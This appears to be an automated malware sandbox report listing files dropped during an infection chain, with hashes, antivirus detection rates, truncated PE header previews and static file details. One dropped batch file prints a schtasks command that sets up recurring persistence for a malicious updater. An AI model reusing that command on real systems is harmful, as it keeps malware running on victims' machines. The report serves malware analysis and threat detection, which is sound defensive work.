                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\EE8C.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):979456
                                                                                                                                                                    Entropy (8bit):7.556960391152121
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:6zyXuMpcJ4J5wnGnq7vH4A3w9qRwDJ3MpsJFgDqxb2GkHv+cqMIf7J2wV:6O+y0Uwniq7vYmyqq3H2Gi36
                                                                                                                                                                    MD5:4F97B257A87062F05EF9BEF6A0ADDA36
                                                                                                                                                                    SHA1:1DC1166CC3754DDD3ADF3A71B28707B9186B2DAB
                                                                                                                                                                    SHA-256:641A4FF84F4BBC48F59FD871DA8CD17FA63DE517D07E4CE646A5000D1B4786D2
                                                                                                                                                                    SHA-512:F30A515FCBBCD525CF792DC6B87F7476C306A8A1A22136207D736A193CE4D8947AB46ACDBDE308CCD105EF69804FFDF8A2D2EC3B1FA9FD8C0A00D8E759609BCA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................. ... ....@.. .......................`............`.....................................W.... ..(....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...(.... ......................@..@.reloc.......@......................@..B........................H........................%..............................................V.('.....}(.....})...*....{(...*..{)...*.0..]....... ..S(%...s*......{(....'...o+...&. ...S(%...o,...&..{)....(...o+...&. ...S(%...o,...&.o-...*....0..;........u&.....,/(.....{(....{(...o/...,.(0....{)....{)...o1...*.*..0..:....... ..n.. )UU..Z(.....{(...o2...X. )UU..Z(0....{)...o3...X..*....('...*.0..e........-.sM...*.-. c..S(%...s4...z.u......-..sN...*..0...(5....o6...(...+(...+..-..sN...*..o9...s....o

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\FourthX.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\914D.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2654720
                                                                                                                                                                    Entropy (8bit):6.545978188908966
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                                                                                                    MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                    SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                                                                                                    SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                                                                                                    SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\914D.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2123218
                                                                                                                                                                    Entropy (8bit):7.9788749010606965
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:ChrF2z0X1W34qvuyXPHcqaGqW9gwLgMyu5noEiyIJAuw:ChFdFWINS/NF9gpMR5oEfF
                                                                                                                                                                    MD5:28B72E7425D6D224C060D3CF439C668C
                                                                                                                                                                    SHA1:A0A14C90E32E1FFD82558F044C351AD785E4DCD8
                                                                                                                                                                    SHA-256:460BA492FBC3163B80BC40813D840E50FEB84166DB7A300392669AFD21132D98
                                                                                                                                                                    SHA-512:3E0696B4135F3702DA054B80D98A8485FB7F3002C4148A327BC790B0D33C62D442C01890CC047AF19A17A149C8C8EB84777C4FF313C95EC6AF64A8BF0B2D54B6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................P............@..........................................P..(............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...(....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jgnnvfj.jap.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0clmvt2.1cq.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2560
                                                                                                                                                                    Entropy (8bit):2.8818118453929262
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                    MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                    SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                    SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                    SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13312
                                                                                                                                                                    Entropy (8bit):5.745960477552938
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                                                    MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                                                    SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                                                    SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                                                    SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_setup64.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6144
                                                                                                                                                                    Entropy (8bit):4.215994423157539
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                                                    MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                                                    SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                                                    SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                                                    SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):23312
                                                                                                                                                                    Entropy (8bit):4.596242908851566
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                    MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                    SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                    SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                    SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\78A4.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):704000
                                                                                                                                                                    Entropy (8bit):6.506132304849261
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:m/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRLh1K8xyF:WkqZ1G7DMvrP537dzHsA6hcHGbH3Elhs
                                                                                                                                                                    MD5:426607EDCEEC6A310076FA659B073D1D
                                                                                                                                                                    SHA1:441DB4FB05A8190E281F0600AAEB1621FE6B9122
                                                                                                                                                                    SHA-256:C92AE308E20D2CBF0CEC47E83828C84F87CF01A8BF03ABE4481239C02F555A9A
                                                                                                                                                                    SHA-512:749889A326CFAFBF044F62C8F789EFDF589B3DB467A8A2836519AFC72F191CB3D7C4868036CC667F5BCCF02B0CE6E21E8C9E5DFF0A0BFAEBD711CFF1B0EF8FE1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\78A4.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):704000
                                                                                                                                                                    Entropy (8bit):6.506132304849261
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:m/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRLh1K8xyF:WkqZ1G7DMvrP537dzHsA6hcHGbH3Elhs
                                                                                                                                                                    MD5:426607EDCEEC6A310076FA659B073D1D
                                                                                                                                                                    SHA1:441DB4FB05A8190E281F0600AAEB1621FE6B9122
                                                                                                                                                                    SHA-256:C92AE308E20D2CBF0CEC47E83828C84F87CF01A8BF03ABE4481239C02F555A9A
                                                                                                                                                                    SHA-512:749889A326CFAFBF044F62C8F789EFDF589B3DB467A8A2836519AFC72F191CB3D7C4868036CC667F5BCCF02B0CE6E21E8C9E5DFF0A0BFAEBD711CFF1B0EF8FE1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsvA60A.tmp\INetC.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):25600
                                                                                                                                                                    Entropy (8bit):5.391050633650523
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
                                                                                                                                                                    MD5:40D7ECA32B2F4D29DB98715DD45BFAC5
                                                                                                                                                                    SHA1:124DF3F617F562E46095776454E1C0C7BB791CC7
                                                                                                                                                                    SHA-256:85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
                                                                                                                                                                    SHA-512:5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsxAC73.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):216576
                                                                                                                                                                    Entropy (8bit):7.155500901207139
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:mPmxOt8q3qGCZUU22cQqaV8lSIWa5l9OpuOfU/6eMsJjEyXAvDmAeqQ:mcOtd6HwQqaVqWSlhOfneMua
                                                                                                                                                                    MD5:823C0164A0A978C450F088B7AE3885D0
                                                                                                                                                                    SHA1:B78950D38D2CE8B295631C0A3CA56AF1257FB07B
                                                                                                                                                                    SHA-256:603A6DF8C501F61593D3DF9C82405736129DB0D1601F830CE953CEC00819F8D9
                                                                                                                                                                    SHA-512:614588F7D1778B035821C953BF109BAE2EA0CB265AE99A9C677B900636A4F472AA36A43DD8AECEB95C404D664B59A7947AA4F9101474D7F8ECF919D3A0C62D31
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................F.....s.....G.....~..........B.....w.....p....Rich...................PE..L....1$c.....................4{...................@...........................~......B......................................$...<.....}.0...................................................X........................................................text............................... ..`.rdata...1.......2..................@..@.data.....z.. ......................@....sowa...|.....}.....................@....tls..........}...... ..............@....xeyekus......}......*..............@..@.jejol........}......,..............@....rsrc...0.....}......0..............@..@........................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Temp\Task.bat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):128
                                                                                                                                                                    Entropy (8bit):4.804860125859994
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuWXp5cViE2J5xAIEyrKBySKFS3:Ogas7SXEFAuWXp+N23faKS3
                                                                                                                                                                    MD5:F012E4BDF6E55957321337AA38F85339
                                                                                                                                                                    SHA1:193314D588B914065D1B10D87320A1E16F8EF773
                                                                                                                                                                    SHA-256:A5A61386800DF682614BF0052295B79CB4D142A1AEF24C0172E8CD48F7C4E1CD
                                                                                                                                                                    SHA-512:77E53F62689C40530CBE72CF56B29D794BA52C6B2B67618D9FF70E1772EE9680228ED9274334B543DB8781CE8B258A68F3C1111FDD66BC1778B93782F21B1AB2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..

                                                                                                                                                                    C:\Users\user\AppData\Roaming\egiibgt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):249344
                                                                                                                                                                    Entropy (8bit):6.742090259377102
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:aWaPSLteSV8G+hdiVRp/8Q+n6rxlVram1h:aWaQteLG/Rx8Q+x+
                                                                                                                                                                    MD5:F35C060B3AC3B38CFF5FC9131E794F93
                                                                                                                                                                    SHA1:AF4EE5521FEC5C34DDC5311D71D47E6B8BE71D3D
                                                                                                                                                                    SHA-256:FEA7F052EE9F727D0ECB888EEF78674E1220C73276010A9CD6D68C4D9D260F4B
                                                                                                                                                                    SHA-512:C0C405AEFD6AFEF532DF4A77DB65CC3CE5DD087CE79A3A24EDC69C7A0FA52F71B92F385BCEBF4E6AEC708B9238C4079CD88620BC5EB1AD4070E368F409F121AB
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......HK...*...*...*..c\#..*..c\...*..c\".g*...R...*...*..k*..c\'..*..c\...*..c\...*..Rich.*..........................PE..L....8.c.................p........................@.................................?F.........................................P...........................................................H........................................................text....n.......p.................. ..`.rdata...5.......6...t..............@..@.data...D........"..................@....vufugag|....P......................@....tls.........`......................@....jeyup.......p......................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Roaming\egiibgt:Zone.Identifier

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                    C:\Users\user\AppData\Roaming\ejiibgt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):175104
                                                                                                                                                                    Entropy (8bit):6.8345161639264935
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:4LWsq2ldQl+lgiKCt2Cp7pTqhVones/wC4pAhKqHee:4LWsqmQKgFwn7puuesqr
                                                                                                                                                                    MD5:BA79778FB5C76EE86A3719452732A68B
                                                                                                                                                                    SHA1:85AE245819AD23FDB546AB3D9F0C70E22BB71AFA
                                                                                                                                                                    SHA-256:61222B4DA1A2082061FEDF9D91E70A13E5B5DF70D3CAC424A5F4C1FC65916312
                                                                                                                                                                    SHA-512:6AC7141D86C6F8C6C1FD237AE75D189F564CE84A4DDCFB78334536E0D772A1DC3FF831744E58C228AA311C7F58B8BB5831FB65C687DA558432396275E654F09C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................F.....s.....G.....~..........B.....w.....p....Rich...................PE..L....|.c.................(...4{..............@....@..........................p}......`......................................$h..<....P}.0...................................................Xe.......................@...............................text....&.......(.................. ..`.rdata...1...@...2...,..............@..@.data.....z..........^..............@....rofi...|.....}......|..............@....tls......... }......~..............@....rehopeb.....0}.....................@..@.jidexi......@}.....................@....rsrc...0....P}.....................@..@........................................................................................................................................................................................................

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):6.742090259377102
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:IIBXMzS0zN.exe
                                                                                                                                                                    File size:249'344 bytes
                                                                                                                                                                    MD5:f35c060b3ac3b38cff5fc9131e794f93
                                                                                                                                                                    SHA1:af4ee5521fec5c34ddc5311d71d47e6b8be71d3d
                                                                                                                                                                    SHA256:fea7f052ee9f727d0ecb888eef78674e1220c73276010a9cd6d68c4d9d260f4b
                                                                                                                                                                    SHA512:c0c405aefd6afef532df4a77db65cc3ce5dd087ce79a3a24edc69c7a0fa52f71b92f385bcebf4e6aec708b9238c4079cd88620bc5eb1ad4070e368f409f121ab
                                                                                                                                                                    SSDEEP:6144:aWaPSLteSV8G+hdiVRp/8Q+n6rxlVram1h:aWaQteLG/Rx8Q+x+
                                                                                                                                                                    TLSH:AD34AF2C23D0C471D153113685A1CBF18ABB7872B6B3798FFFD16A7E1E3929192A4309
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......HK...*...*...*..c\#..*..c\...*..c\".g*...R...*...*..k*..c\'..*..c\...*..c\...*..Rich.*..........................PE..L....8.c...

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:0331656165311f46

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x4016a9
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x639838A9 [Tue Dec 13 08:32:41 2022 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
